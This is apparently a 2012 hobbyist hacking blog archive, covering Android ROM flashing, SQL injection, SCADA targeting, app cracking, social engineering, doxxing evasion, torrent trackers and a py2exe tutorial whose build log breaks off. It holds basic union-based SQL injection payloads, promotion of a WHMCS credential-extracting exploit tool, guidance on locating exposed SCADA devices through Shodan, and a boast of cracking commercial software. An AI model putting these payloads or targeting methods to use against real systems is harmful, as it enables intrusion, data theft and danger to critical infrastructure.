Sunday, November 18, 2012

Android custom roms basics

hey guys wassup whoa such a long time sorry i couldn't post anything awesome as i was busy with my life and some major up downs. ok so now i got a galaxy Y for testing purposes and i was just messing with the phone and the best way of messing is installing different roms and etc.
So i start with the basics, the kernel is the basic part of every working computer or handheld device on earth. It is the bridge between hardware and software and its installed on rom that can be changed or erased but with some proper procedure. Android truely shares the same kernel as of what we have in linux for desktop but with some modifications So if you see this diagram you will know how critical a kernel is....
























Ok how does a kernel looks like a general question comes to our mind its in .img format and contains main kernel file and boot kernel image and other drivers. So there are lots of kernel available in market which have different types of specialities some are stable, some are exprimental etc. So now comes the system apps and lots and lots of configuration files like audio bluetooth,wifi, camera, etc do not mess with these files until u are sure what are you doing. Remember all mods or custom roms do not come with custom kernel, it depends on the developer that he wants to use stock (company default) rom or a custom rom for his own. Now there are 2 ways to flash your phone to use a custom rom either with PC that is odin mode or either with clockworkmod commonly called as cwm. the basic difference between odin flashes and cwm is that, that odin uses a pc for flashing while. cwm method uses a zip file and only phone in recovery mode
the main differences are as follows.

Odin flashes are safer compared to CWM flashes in so much as they are a raw device dump with no intervention in between. Its just a basic read/write operation. CWM operations must call the current kernel in order to perform the tasks (which is why the brick bug emerges not by flashing an affected kernel, but using CWM with it afterwards). So although a CWM flash is still fundamentally an I/O process, the currently installed kernel plays its part in order to do so.

Only real danger with Odin flashes is power supply, so if you have a power cut in the middle of a flash, there is a good chance you might not ever get your device back up and running, especially if it was during a flash of the boot loader).
the firmwares is in .zip for CWM only. and for Odin/Mobile Odin  files are in
.tar or .md5 (or .smd) format (other formats for other types of flash eg. .bin, .pit, .xml).
xda-developers is the best forum ever for android hacks,mods custom roms, etc

So this is pretty much for now
for more information you can read this article on android forums


Friday, August 10, 2012

Difference between integer based and string based SQL injection

Hi friends  this one i had posted a question on hackforums about difference between string based and integer based SQL injection it can be explained as follows
integer
SELECT * FROM pages WHERE page_id=10 [inject] order by title limit 1,
so the injection would be
?id=10 union select 1,2,3--
finallly you get
SELECT * FROM pages WHERE page_id=10 union select 1,2,3-- order by title limit 1,1

string

SELECT FROM pages WHERE page_id="10" [injectorder by title limit 1,
so the injection would be
?id=10' union select 1,2,3--+
final:
select * from pages where page_id="10"' union select 1,2,3--+ order by title limit 1,1


so in integer based SQL injection you dont have to put a ' and in string based SQL injection you have to put a ' and a + sign at the end
the original post here
enjoy

Monday, August 6, 2012

Will ultrabooks eliminate DVDs and Blue ray dics

Hi guys wassup how are you doing? yesterday my brother bought a lenovo ultrabook it was almost copy of a macbook with the hardware but the its slim, keyboard is easy to type and fast. but the fact that it had SSD and no DVD drive only some USB ports, HDMI ports and ethernet port etc and some touch pad changes. so the question is due to new emerging race of ultrabooks will CDs and DVDs will become outdated. maybe not coz still most of the games, blue-ray movies,etc come in DVDs. they are cheap but still they can't just get outdated and what i expect to be that new ultrabooks will have a dvd drive or they wont get apropriate market in india. i am still happy with my old laptop. and i am going to college this month for studies of computer engineering the thing i had loved to do the most.

Saturday, August 4, 2012

Call For Papers for the first edition of Hzine(Hacking Magazine)

Hcon has decided to release hacking magazine for you guys. it will be an online magazine free for all but for now it needs contributions. Contributions in the sense, Articles. For releasing anything you need good fleshy information which is not possible for one man. So here by i ask you all to contribute to this great effort made by Ashish Mistry and also if you cannot for any reasons atleast share it on your blog like me or on your facebook homepage.
Hcon, Information security Training and Tools provider, launched their own PenTesting Magazine ‘Hzine’. We are inviting unique and interesting articles for our First Edition of Hzine.

Theme for the articles : Operating Systems (OS)
Articles can be on Topics :
1. Penetration testing / Hacking
2. Forensics
3. Malware
4. Exploit Development
5. Embedded, Mobile OS
6. OS Configs and Defenses
7. Offensive or Defensive Programming
8. About OS Tools, any specific OS articles
9. Troubleshooting any security issue
10. Any other OS related quality articles are also welcome
Things to consider for article submission :
1. It will be a free Magazine
2. It has to be your own work, research
3. It has to be in ENGLISH only
4. As we are not gaining any money from it, so don’t expect from us to give you
5. Send articles in document format only (doc, docx, odt)
6. articles has to be with if any needed reference
More info: http://www.hcon.in/hzine.html
Contact:  https://www.facebook.com/Root.Hcon
www.hcon.in/contact-us.html
if you feel you have it in you !!

Monday, July 30, 2012

computer knowledge megacollection

hi guys i have got an awesome collection of computer books on internet its like 19 GB of books of all types have a look here
  https://fbcdn-sphotos-a.akamaihd.net/hphotos-ak-snc7/s720x720/376937_444943348871919_124568779_n.jpg
have fun dont forget to add trackers 

udp://tracker.publicbt.com:80/announce

udp://tracker.openbittorrent.com:80/announce

http://fr33dom.h33t.com:3310/announce

http://cpleft.com:2710/announce

http://tracker.ex.ua/announce

http://exodus.desync.com:6969/announce

http://tracker.torrentbay.to:6969/announce

udp://tracker.1337x.org:80/announce

udp://fr33domtracker.h33t.com:3310/announce

udp://tracker.ccc.de:80

udp://11.rarbg.com/announce

udp://9.rarbg.com:2710/announce

udp://10.rarbg.com/announce







Thursday, July 12, 2012

python based Shell analyser

hi guys wassup how you doing? this time i have got an awesome idea and i have started working on it. we already have a python based script called neopi.py to scan and analyse encoded and obfuscated. i am writing my own php and python code in such a way that when a file is uploaded it is checked for both unencoded signatures and encoded things. the first thing i have to find is a common signature for all shells and then combine code of mine and neopi and a php upload page that will initialize a scan after files uploaded and  change its perms to obviously to not let execute. and i think the php one is the most hard part for me as i am totally not familiar with php but i have some good friends to help me out, and guess what last month this blog has completed its 2 years thanks for all yours support and your subscriptions Rjcrystal if u have any suggestions then comment here

Friday, July 6, 2012

Update your facebook status via your own name


hi guys wassup sorry for not bringing any post So you might have seen that there are many apps that post on your wall and it has a small link at the bottom right corner telling VIA (app name). so how did they do that its very easy you need API(application programming interface) key of any app to do that.
we will make a app of our name so that we can use our apps` api and update facebook status via it
STEPS
  1. goto facebook developers then create an app by selecting app tab on the upper side
  2. then there will be a small box asking for app names in app display name you can fill out any name which is 3 words long and then click i agree facebook platform policies (even if you dont lol )
  3. then fill the security check(captcha) and then you will be taken to app settings then save changes and then you will see a many numbers in that our useful one is App ID/API Key save it
  4. then goto https://www.facebook.com/connect/prompt_feed.php?preview=true&api_key=xxxxxxxx (here xxx is your api key) copy your apps api key in place of xxxxxx and then hit the big enter button and you will see that ther will be a update status button just write what ever you want and bravo you have updated your status VIA your own name
here is big list of some good APPS API KEY with which you can update your status same as mentioned before
*. Skynet (249284985083592)
*. iPhone (6628568379)
*. Blackberry (2254487659)
*. Palm (7081486362)
*. Sidekick (21810043296)
*. Sony Ericsson (38125372145)
*. Xbox LIVE (5747726667)
*. iPad (112930718741625)
*. Foursquare (86734274142)
*. Telegram (140881489259157)
*. Carrier Pigeon (130263630347328)
*. Morse Code (134929696530963)
*. Message in a Bottle (123903037653697)
*. Commodore 64 (138114659547999)
*. Your moms computer (132386310127809)
*. TRS-80 (134998549862981)
*. K.I.T.T. (129904140378622)
*. Mind Computer Interface (121111184600360)
*. eyePhone (110455835670222)
*. toaster (203192803063920)
*. microwave (0a5266c8844a1b09211e7eb38242ac2f)
*. Super Nintendo Entertainment System (235703126457431)
*. Gameboy Color (180700501993189)
*. GoD (256591344357588)
*. Glade Air Freshner (4aeb4db2e8df1cdb7f952b2269afb560)
*. Strawberry (a4c9fb1708a848c2241674531176209b)
*. The moon (221826277855257)
*. Dr. Pepper (eea90d40e1d12565695dbbbdbd5e965b)
*. Nintendo wii (243870508973644)
*. Alcohol (250335888312118)
*. Cheese (218791271497130)
*. iPod Nano (142039005875499)
*. Nintendo 64 (236264753062118)
*. Microsoft Excel (242740155751069)
*. Linux Ubuntu (220593361311050)
*. iPhone 5g (211333348912523)
*. My Bedroom (174811032586879)
*. Your Mums Bedroom (5f64bbc9ac2f12b983200925da461322)
*. Lamp (230755826955133)
*. Refrigerator (250828364944350)
*. A potato (127926427295267)
*. Nasa Satellite (31d608d30292175bf7703149699ccb39)
*. Pogo Stick (185103391549701)
*. Banana Phone (1477a4cd29ec724a3de19be5d26e0389)
*. Google+ (4d8243dbb7064f88351fe6c809582320)
*. The Future (108372819220732)
*. Smoke Signal (134138923334682)
*. tin cans connected by string (242191299125647)
*. Pokedex (de3da265cf6976745bb1d60a8c198151)
*. Telepathy (ea01a57edb26cf1de143f09d45cfa913)
*. Typewriter (d3d554bf60297cb2c384e3d7cf5a066d)
*. Harry Potter (b8ebeb983f45eaa0bd5f4f66cad97654)
*. TARDIS (200439256674396)
*. Pip Boy (142806259133078)
*. Mind Control (1dc633368924b3b0b4d08e3f83230760)
*. Jedi Mind Control (240597869302110)
*. Telekinesis (224139600960217)
*. Post-It Note (115227201900831)
*. GLaDOS (246126362083515)
*. Ansible (185474028180003)
*. W.O.P.R (228373497202865)
*. Airwolf (123944137696757)
*. HMCS Belafonte (222345601140304)
*. HAPPY BIRTHDAY (60280877509)

Tuesday, July 3, 2012

Cracked first app

hello guys wassup ?? sorry i could not post anything from many days but still people visit my blog and share it thanks to you all guys. and my e-book has been downloaded 150 times thanks for all people's support. So my life is having many ups and downs right now. today i tried to crack an app called rontgen it is used in making patient reports it is made in visual foxpro its was pretty EASY to crack it, then i made a simple installer to install it and boom it works awesome. now i will post more on SCADA and ASM software cracking

Friday, June 8, 2012

Censorship in India, beginning of sunset of internet .... or a political game?

Before some months Govt. of india passed rules to censor websites like pastebin, thepiratebay, vimeo etc first of all reliance started blocking websites and some were even not told by govt to block. then Anonymous india hacked gateway of reliance and we all are aware of that stuff. but just think once what is need of censorship? why govt is having problems with sites like pastebin etc . Because lots of websites databases getting hacked everyday ?? and pastebin was used to post hacked data ?? the main reason what i think is Piracy because torrents are the biggest source of pirated contents. even songspk.pk was blocked long ago. though some ISP are not in QUE for blocking. On one side govt passes bill for broadband in every home for development. of the country and increasing phones etc. so now still the question is WHY on one side govt is doing more for internet development etc and on other side websites are being censored. till now i have not experienced censorship :) its not that hard to bypass because the DNS query. is this really necessary or just other countries are agreeing with ACTA and other acts , The major reason seems to me is that they want to suppress peoples voice... this is just the beginning of the thing and if we accept it then in future more sites will be blocked and so on..... what is use of freedom if its only on paper and not in reality, its time to react and do something legal dont wait till every ISP accepts the policy of govt. dont bypass we can bypass these idiotic censorship but that should be the last option. if we try to bypass censored websites then govt will think that we are not reacting and we are silent, so maybe if govt will make the mechanism more powerful than before and we may not be able to bypass new systems..... DId the inventors of ARPnet would had the idea that the thing they made for human development and comfort will endup like this ??? we cannot afford this censorship

Monday, June 4, 2012

Researching and pentesting DTH services for fun and profit

 
Hi guys sorry for not posting from long time but i have lots of work currently i am making videos on HCON STF for more easy pentesting and research . will post soon......
today i was thinking to hack or pentest the DTH devices that are bit modern that regular cable connections and they also have so called firmware for good organization of content.
the transmission in tata sky is mpeg-2 type while others use mpeg-4. the transmission is encrypted (of course :P) and that is decrypted  by the card so called as smart card. the card stores the customers information its like its identitiy card of the box :D and that can be read using external devices and can also be connected to a computer the thing is most of the cards are not generic so sometimes you have to make one yourself. and they also have a cam module (conditional access module) that is used when you have to use some others service without changing the settop box and other things. but thing is tata sky is having such module slot but the transmission they use is incompatible with other DTH companies now thats bit confusing :/ i have opened tata sky settop box and hopeful i was able to get a simple circuit map of the STB from the mpeg-2 decoder processor website :D so now i have got some good results if you have any ideas or questions ask me here is the circuit diagram of it.
it has 128 Mb SDRAM , a EPROM etc etc
the main things that can be done according to me
1=> smart card editing or reading (most probable thing that can be done)
2=>Custom firmware patching (somewhat possible)
3=>memory patching (bit hard)
4=>using CAM module to connect box to a computer
i also found some useful information here about hacking smart cards =>http://www.123helpme.com/view.asp?id=68386 

Saturday, May 19, 2012

Learning Assembly language from basics

hi guys sorry for posting late as i dont have much time from school and other things after learning some basic python i am going with assembly language yeah its hard as some of hardware things are important for it. its 1 level up from binary and the programs work hell fast in assembly. Directly jumping to assembly is risky first you need to study architecture of your computer and its working there are some selected book which cover from basics to advanced i am posting some of them if you are totally new to ASM consider reading "programming from ground up" the things are quite good in it and easy to understand
another great book is the art of assembly. basically ASM and its code is based on type of processor there are major 2 types of processor
  1. CISC (pentium, asus, etc)
  2. RISC (SCADA devices use this processors to make work faster and easier)
so have fun with assembly it will also create your programming concepts more clear and better. i have put 4 best books to read to learn ASM
  1. Art of assembly 
  2. programming from ground up
  3. Guide to Assembly Language - A Concise Introduction 
  4. Introduction to 80x86 Assembly Language and Computer Architecture
  5. Introduction to assembly language
download other books =>here

Tuesday, May 8, 2012

Reading and Editing metadata using exiftool

hi guys this is helpful to many to trace people and reading data and adding information sometimes wrong information for misdirection.
ExifTool is a platform-independent Perl library plus a command-line application for reading, writing and editing meta information in a wide variety of files.

Features 

  • Powerful, fast, flexible and customizable
  • Supports a large number of different file formats
  • Reads EXIF, GPS, IPTC, XMP, JFIF, MakerNotes, GeoTIFF, ICC Profile, Photoshop IRB, FlashPix, AFCP, ID3 and more...
  • Writes EXIF, GPS, IPTC, XMP, JFIF, MakerNotes, ICC Profile, Photoshop IRB, AFCP and more...
  • Reads and writes maker notes of many digital cameras
  • Decodes a riddle wrapped in a mystery inside an enigma
  • Numerous output formatting options (including tab-delimited, HTML, XML and JSON)
  • Multi-lingual output (cs, de, en, en-ca, en-gb, es, fi, fr, it, ja, ko, nl, pl, ru, sv, tr, zh-cn or zh-tw)
  • Geotags images from GPS track log files (with time drift correction!)
  • Generates track logs from geotagged images
  • Shifts date/time values to fix timestamps in images
  • Renames files and organizes in directories (by date or by any other meta information)
  • Extracts thumbnail images, preview images, and large JPEG images from RAW files
  • Copies meta information between files (even different-format files)
  • Reads/writes structured XMP information
  • Deletes meta information individually, in groups, or altogether
  • Sets the file modification date from EXIF information
  • Supports alternate language tags in XMP, PNG, ID3, Font, QuickTime, ICC Profile, MIE and MXF information
  • Processes entire directory trees
  • Creates text output file for each image file
  • Creates binary-format metadata-only (MIE) files for metadata backup
  • Automatically backs up original image when writing
  • Organizes output into groups
  • Conditionally processes files based on value of any meta information
  • Ability to add custom user-defined tags
  • Support for MWG (Metadata Working Group) recommendations
  • Recognizes thousands of different tags
  • Tested with images from thousands of different camera models
  • Advanced verbose and HTML-based hex dump outputs
how to use on windows just for basics
open command put exiftool and your image in same directory and type
exiftool a.jpg -a
and boom you have all the info theres much more than this but for now we will keep it to this much theres more info here 

WHMCS pentesting tool

hi guys wassup today i found a good tool for pentesting WHMCS servers it has many types of payloads and exploits so have fun and happy hacking its made by team of projectx blog
Features:
*GUI
*In .EXE Format
* 10 payloads = 10 directories
* Gets the db_username, db_password, db_license, db_host, db_name, cc_enryption_hash, and templates_compiledir
* Allows the user to use their own directory by putting it after the target link
* Added a song entitled Cowboys From Hell by Pantera (because we love Metal Rock! m/)
Download Link:
oR

Thursday, April 26, 2012

My book on hacking A guide, A representation of todays condition of cyber lif3 of hackers

hi guys wassup i was a skid before but i left that path and went in the search of truth and knowledge. SQL injection is fun but then i realized that thats not true hacking and now i am changed....... Looking at the current condition of skids and new beginners i wrote a small book to start with. it does not contain any article,tutorial,or 0day exploits it contains real life and experiences that are experienced by young hackers it contains inspirational things that will help people a lot. hope you like it. my main motive was to direct young progressing hackers to a path that will lead to a good hacking carrier omg too much philosophy :P but its important too download

Monday, April 23, 2012

How to become d0x pr00f

hi friends after exams i am free now will write some posts. yesterday i saw 1 one of my friends exposing s3rverexe. and s3rverexe also tried to expose him but failed. so today i will give you some tips on not letting your identities exposed. so first never share any information on forums, dating sites. matrimonial websites, or not even Facebook as now Google indexes its posts and comments. and be aware of adding unknown friend in your real account and never put a connection between your real and fake account. mostly if you are in INDIA you don't need to worry much as there are not any public records. but for countries like USA there are sites which have many information about you by credit-card etc.
Only hiding everything is not fun always. sometimes even misdirection also makes fun.
real life example. i tired to get information about coded32 i googled his name i got his threads and in one thread i saw that he posted his university results then i thought that there was someone of similar profile on facebook. he had chosen a person similar to his behavior,living place(old ), and university. that was a type of misdirection
so you can also try it on others and secure your identity online. this becomes important after passing of CISPA.
stay saFE.

Saturday, April 7, 2012

Introduction to SCADA hacking

hi guys wassup today i will tell you about SCADA hacking some other reosurces 

so first what is SCADA ? its abbreviated as Supervisory Control and Data Acquisition so basically there are lots of hardwares in it ans used in power grids, Dams and many other industires. they use primitive softwares that are easy to exploit. remember Stuxnet that exploited Iran`s windows computer to exploit iran`s nuclear facility which was of Siemens. same way there are lots of companies who make SCADA and for ease of use and to control them from remote places they have internet connection
so basically there are PLC (programmable logic contoller) which are exploited mostly. the I/O cycles are controlled by RISC (Reduced instruction set computing) processor

PLCs use RISC processors to run continuous, cyclical programs and they take time in their I/O cycle to talk to the SCADA unit and receive instructions from the SCADA to modify its instruction sets or operating parameters. SCADA typically operates by evaluating the input data and determine if it is within an allowable set of parameters

1st how to find vulnerable SCADA devices
you must know what an HTTP header does and also that we can know that what software or authentication a server is running. with the use of that we will find vulnerable SCADA devices. A website called Shodanhq does and makes our work easy
from that a specific code(something like dorks) we can get lots of SCADA

2nd exploits
SCADA exploits are hard to get  coz no one shares that sometimes you need to make your own but you can get some from exploit Db or there is are modules by metasploit to exploit some of them are here or here 

RESOURCES
1. shodanhq.com
2. scadahacker.com
3. SCADA dorks list 
4.SCADA security research and tools 

warning SCADA hacking is a very very  dangerous it can get people killed and lot of property damage... and end up in your life in jail for longer time and
this article is for education purposes only

Friday, April 6, 2012

ROOTCON 6 Philippines premier hacking conference

One of my friends from cebu city (Philippines) is a blogger at theprojectxblog.net and blog.rootcon.org
its a awesome conference for hackers and security professionals registration is not that expensive every body can visit these conference...
the main language of communication will be english
for more visit here =>>https://rootcon.org

Monday, April 2, 2012

Social engineering- The art of human hacking


you might be confused that why this thing is here right ? social engineering is also a type of hacking with humans. so i thought lets do something new!!


the official portal of social engineering defines it like this.....

Social Engineering (SE) is both incredibly complex and amazingly simple.
What really is social engineering? We define  it as the act of manipulating a person to accomplish goals that may or may not be in the “target’s” best interest. This may include obtaining information, gaining access, or getting the target to take certain action.

Due to the mystery surrounding this dark art many people are afraid of it, or they feel they will never be able to accomplish a successful social engineering test. However, every time you try to get someone to do something that is in your interest, you are engaging in social engineering. From children trying to get a toy from their parents to adults trying to land a job or score the big promotion, all of it is a form of social engineering.
so why i am posting this is because you can try something new and interesting thing and i am also personally interested in this method of hacking. So how you can start Social engineering
it totally depends on your mind power and observation  power . you need to think how humans behave in what type of situation for eg in a bomb blast every body wants safety people think that they are insecure ? so a good social engineer will try to feel people that they are secure like winning trust on people and they think that he cares about US or me, remember social engineering is not like cheating people or frauding them in traps etc.its just for educational knowledge
think of a salesmen or a TV advertisements they are perfect examples of social engineering on people to sell their products,
Wikipedia defines it like this
" it is the act of manipulating people into performing actions or divulging confidential information. While similar to a confidence trick or simple fraud, the term typically applies to trickery or deception for the purpose of information gathering, fraud, or computer system access; in most cases the attacker never comes face-to-face with the victim." Although it has been given a bad name by the plethora of "free pizza", "free coffee", and "how to pick up chicks" sites, aspects social engineering actually touches on many parts of daily life. Many consider social engineering to be the greatest risk to security "
So sometimes it become more easy with Facebook ..HOW??
consider a scenario where a girl is chatting with a boy (a classic example where girl is thought to be SEr)
so from starting if the girl didnt knew the boy in real life then the boy is surely going to do some flirt (for common people) and the girl gets most common and basic details by using some special word etc(you know that)
so what are we talking here
basically what i think SE is like telling some one that hey i am here for you..
mostly strangers need more time than known ones to get SEd,
mostly sometimes its like feeling of commonness for eg a person from india has went to london or america or some where else and some person from india meets him and asks are you indian he says yeah i am indian and nice to meet you and so on...
another example
like someone who meets a guitarist or a singer and says i am also a guitarist or something else so they feel more power-full as they have same type of hobbies
other thing i learned from (Ashish mistry he is a grest SE and IT security specialist )that SEers that they learn your local language to become more closer to you.
if you want to do more research on it then  visit this sites will post more after some time.
and like fingerprinting you should have good background information about victim. and yeah kevin mitnik was considerd one of the best social engineer of his time
1st hope number 6
2nd social-engineer
3rd its about how humans behave and react  2knowmyself

Saturday, March 31, 2012

convert python programs to standalone windows exe file

hi guys wassup i found a interesting thing that i would like to share as a python programmer
the program is py2exe as the name suggests it converts python files to an exe standalone file here is the method

Create your setup script (setup.py)

py2exe extends Distutils with a new "command". If you've installed third party Python modules then there's a good chance you've seen at least one distutils command:

C:\Tutorial>python setup.py install
"install" is a Distutils command that installs something (typically a Python module or package). The details Distutils needs to do that installation are contained in setup.py (and sometimes other associated files).
"py2exe" is a new Distutils command that is added when you import py2exe. To use py2exe you need to create a setup.py file to tell Distutils and py2exe what you want to do. Here's a setup.py whose simplicity is appropriate for our sample program...

     from distutils.core import setup
     import py2exe
    
     setup(console=['hello.py'])
save it as setup.py and hello.py is your python filename 

Notice that this is ordinary Python. Let's go through it line by line...
  1. When working with py2exe the only part of Distutils we'll typically need to reference directly is the setup function, so that's all we'll import.
  2. Once Distutils is loaded, we need to load py2exe so that it can add its command.
  3. Whitespace is good!
  4. Call setup and tell it that we want a single console application and the main entry point is "hello.py".

Run your setup script

The next step is to run your setup script. Make sure to give the py2exe command and expect to see lots and lots of output:
C:\Python27> python setup.py py2exe
running py2exe
creating C:\Python27\build
creating C:\Python27\build\bdist.win32
creating C:\Python27\build\bdist.win32\winexe
creating C:\Python27\build\bdist.win32\winexe\collect-2.7
creating C:\Python27\build\bdist.win32\winexe\bundle-2.7
creating C:\Python27\build\bdist.win32\winexe\temp
creating C:\Python27\dist
*** searching for required modules ***
*** parsing results ***
creating python loader for extension 'unicodedata' (C:\Python27\DLLs\unic
creating python loader for extension 'select' (C:\Python27\DLLs\select.py
creating python loader for extension '_socket' (C:\Python27\DLLs\_socket.
creating python loader for extension '_hashlib' (C:\Python27\DLLs\_hashli
creating python loader for extension '_ssl' (C:\Python27\DLLs\_ssl.pyd ->
creating python loader for extension 'bz2' (C:\Python27\DLLs\bz2.pyd -> b
*** finding dlls needed ***
*** create binaries ***
*** byte compile python files ***
byte-compiling C:\Python27\build\bdist.win32\winexe\temp\_hashlib.py to _
byte-compiling C:\Python27\build\bdist.win32\winexe\temp\_socket.py to _s
byte-compiling C:\Python27\build\bdist.win32\winexe\temp\_ssl.py to _ssl.
byte-compiling C:\Python27\build\bdist.win32\winexe\temp\bz2.py to bz2.py
byte-compiling C:\Python27\build\bdist.win32\winexe\temp\select.py to sel
byte-compiling C:\Python27\build\bdist.win32\winexe\temp\unicodedata.py t
byte-compiling C:\Python27\lib\StringIO.py to StringIO.pyc
byte-compiling C:\Python27\lib\UserDict.py to UserDict.pyc
byte-compiling C:\Python27\lib\__future__.py to __future__.pyc
byte-compiling C:\Python27\lib\_abcoll.py to _abcoll.pyc
byte-compiling C:\Python27\lib\_strptime.py to _strptime.pyc
byte-compiling C:\Python27\lib\_threading_local.py to _threading_local.py
byte-compiling C:\Python27\lib\_weakrefset.py to _weakrefset.pyc
byte-compiling C:\Python27\lib\abc.py to abc.pyc
byte-compiling C:\Python27\lib\atexit.py to atexit.pyc
byte-compiling C:\Python27\lib\base64.py to base64.pyc
byte-compiling C:\Python27\lib\bdb.py to bdb.pyc
byte-compiling C:\Python27\lib\bisect.py to bisect.pyc
byte-compiling C:\Python27\lib\calendar.py to calendar.pyc
byte-compiling C:\Python27\lib\cmd.py to cmd.pyc
byte-compiling C:\Python27\lib\codecs.py to codecs.pyc
byte-compiling C:\Python27\lib\collections.py to collections.pyc
byte-compiling C:\Python27\lib\copy.py to copy.pyc
byte-compiling C:\Python27\lib\copy_reg.py to copy_reg.pyc
byte-compiling C:\Python27\lib\difflib.py to difflib.pyc
byte-compiling C:\Python27\lib\dis.py to dis.pyc
byte-compiling C:\Python27\lib\doctest.py to doctest.pyc
byte-compiling C:\Python27\lib\dummy_thread.py to dummy_thread.pyc
byte-compiling C:\Python27\lib\email\__init__.py to email\__init__.pyc
creating C:\Python27\build\bdist.win32\winexe\collect-2.7\email
byte-compiling C:\Python27\lib\email\_parseaddr.py to email\_parseaddr.py
byte-compiling C:\Python27\lib\email\base64mime.py to email\base64mime.py
byte-compiling C:\Python27\lib\email\charset.py to email\charset.pyc
byte-compiling C:\Python27\lib\email\encoders.py to email\encoders.pyc
byte-compiling C:\Python27\lib\email\errors.py to email\errors.pyc
byte-compiling C:\Python27\lib\email\feedparser.py to email\feedparser.py
byte-compiling C:\Python27\lib\email\generator.py to email\generator.pyc
byte-compiling C:\Python27\lib\email\header.py to email\header.pyc
byte-compiling C:\Python27\lib\email\iterators.py to email\iterators.pyc
byte-compiling C:\Python27\lib\email\message.py to email\message.pyc
byte-compiling C:\Python27\lib\email\mime\__init__.py to email\mime\__ini
creating C:\Python27\build\bdist.win32\winexe\collect-2.7\email\mime
byte-compiling C:\Python27\lib\email\parser.py to email\parser.pyc
byte-compiling C:\Python27\lib\email\quoprimime.py to email\quoprimime.py
byte-compiling C:\Python27\lib\email\utils.py to email\utils.pyc
byte-compiling C:\Python27\lib\encodings\__init__.py to encodings\__init_
creating C:\Python27\build\bdist.win32\winexe\collect-2.7\encodings
byte-compiling C:\Python27\lib\encodings\aliases.py to encodings\aliases.
byte-compiling C:\Python27\lib\encodings\ascii.py to encodings\ascii.pyc
byte-compiling C:\Python27\lib\encodings\base64_codec.py to encodings\bas
byte-compiling C:\Python27\lib\encodings\big5.py to encodings\big5.pyc
byte-compiling C:\Python27\lib\encodings\big5hkscs.py to encodings\big5hk
byte-compiling C:\Python27\lib\encodings\bz2_codec.py to encodings\bz2_co
byte-compiling C:\Python27\lib\encodings\charmap.py to encodings\charmap.
byte-compiling C:\Python27\lib\encodings\cp037.py to encodings\cp037.pyc
byte-compiling C:\Python27\lib\encodings\cp1006.py to encodings\cp1006.py
byte-compiling C:\Python27\lib\encodings\cp1026.py to encodings\cp1026.py
byte-compiling C:\Python27\lib\encodings\cp1140.py to encodings\cp1140.py
byte-compiling C:\Python27\lib\encodings\cp1250.py to encodings\cp1250.py
byte-compiling C:\Python27\lib\encodings\cp1251.py to encodings\cp1251.py
byte-compiling C:\Python27\lib\encodings\cp1252.py to encodings\cp1252.py
byte-compiling C:\Python27\lib\encodings\cp1253.py to encodings\cp1253.py
byte-compiling C:\Python27\lib\encodings\cp1254.py to encodings\cp1254.py
byte-compiling C:\Python27\lib\encodings\cp1255.py to encodings\cp1255.py
byte-compiling C:\Python27\lib\encodings\cp1256.py to encodings\cp1256.py
byte-compiling C:\Python27\lib\encodings\cp1257.py to encodings\cp1257.py
byte-compiling C:\Python27\lib\encodings\cp1258.py to encodings\cp1258.py
byte-compiling C:\Python27\lib\encodings\cp424.py to encodings\cp424.pyc
byte-compiling C:\Python27\lib\encodings\cp437.py to encodings\cp437.pyc
byte-compiling C:\Python27\lib\encodings\cp500.py to encodings\cp500.pyc
byte-compiling C:\Python27\lib\encodings\cp720.py to encodings\cp720.pyc
byte-compiling C:\Python27\lib\encodings\cp737.py to encodings\cp737.pyc
byte-compiling C:\Python27\lib\encodings\cp775.py to encodings\cp775.pyc
byte-compiling C:\Python27\lib\encodings\cp850.py to encodings\cp850.pyc
byte-compiling C:\Python27\lib\encodings\cp852.py to encodings\cp852.pyc
byte-compiling C:\Python27\lib\encodings\cp855.py to encodings\cp855.pyc
byte-compiling C:\Python27\lib\encodings\cp856.py to encodings\cp856.pyc
byte-compiling C:\Python27\lib\encodings\cp857.py to encodings\cp857.pyc
byte-compiling C:\Python27\lib\encodings\cp858.py to encodings\cp858.pyc
byte-compiling C:\Python27\lib\encodings\cp860.py to encodings\cp860.pyc
byte-compiling C:\Python27\lib\encodings\cp861.py to encodings\cp861.pyc
byte-compiling C:\Python27\lib\encodings\cp862.py to encodings\cp862.pyc
byte-compiling C:\Python27\lib\encodings\cp863.py to encodings\cp863.pyc
byte-compiling C:\Python27\lib\encodings\cp864.py to encodings\cp864.pyc
byte-compiling C:\Python27\lib\encodings\cp865.py to encodings\cp865.pyc
byte-compiling C:\Python27\lib\encodings\cp866.py to encodings\cp866.pyc
byte-compiling C:\Python27\lib\encodings\cp869.py to encodings\cp869.pyc
byte-compiling C:\Python27\lib\encodings\cp874.py to encodings\cp874.pyc
byte-compiling C:\Python27\lib\encodings\cp875.py to encodings\cp875.pyc
byte-compiling C:\Python27\lib\encodings\cp932.py to encodings\cp932.pyc
byte-compiling C:\Python27\lib\encodings\cp949.py to encodings\cp949.pyc
byte-compiling C:\Python27\lib\encodings\cp950.py to encodings\cp950.pyc
byte-compiling C:\Python27\lib\encodings\euc_jis_2004.py to encodings\euc
byte-compiling C:\Python27\lib\encodings\euc_jisx0213.py to encodings\euc
byte-compiling C:\Python27\lib\encodings\euc_jp.py to encodings\euc_jp.py
byte-compiling C:\Python27\lib\encodings\euc_kr.py to encodings\euc_kr.py
byte-compiling C:\Python27\lib\encodings\gb18030.py to encodings\gb18030.
byte-compiling C:\Python27\lib\encodings\gb2312.py to encodings\gb2312.py
byte-compiling C:\Python27\lib\encodings\gbk.py to encodings\gbk.pyc
byte-compiling C:\Python27\lib\encodings\hex_codec.py to encodings\hex_co
byte-compiling C:\Python27\lib\encodings\hp_roman8.py to encodings\hp_rom
byte-compiling C:\Python27\lib\encodings\hz.py to encodings\hz.pyc
byte-compiling C:\Python27\lib\encodings\idna.py to encodings\idna.pyc
byte-compiling C:\Python27\lib\encodings\iso2022_jp.py to encodings\iso20
byte-compiling C:\Python27\lib\encodings\iso2022_jp_1.py to encodings\iso
byte-compiling C:\Python27\lib\encodings\iso2022_jp_2.py to encodings\iso
byte-compiling C:\Python27\lib\encodings\iso2022_jp_2004.py to encodings\
byte-compiling C:\Python27\lib\encodings\iso2022_jp_3.py to encodings\iso
byte-compiling C:\Python27\lib\encodings\iso2022_jp_ext.py to encodings\i
byte-compiling C:\Python27\lib\encodings\iso2022_kr.py to encodings\iso20
byte-compiling C:\Python27\lib\encodings\iso8859_1.py to encodings\iso885
byte-compiling C:\Python27\lib\encodings\iso8859_10.py to encodings\iso88
byte-compiling C:\Python27\lib\encodings\iso8859_11.py to encodings\iso88
byte-compiling C:\Python27\lib\encodings\iso8859_13.py to encodings\iso88
byte-compiling C:\Python27\lib\encodings\iso8859_14.py to encodings\iso88
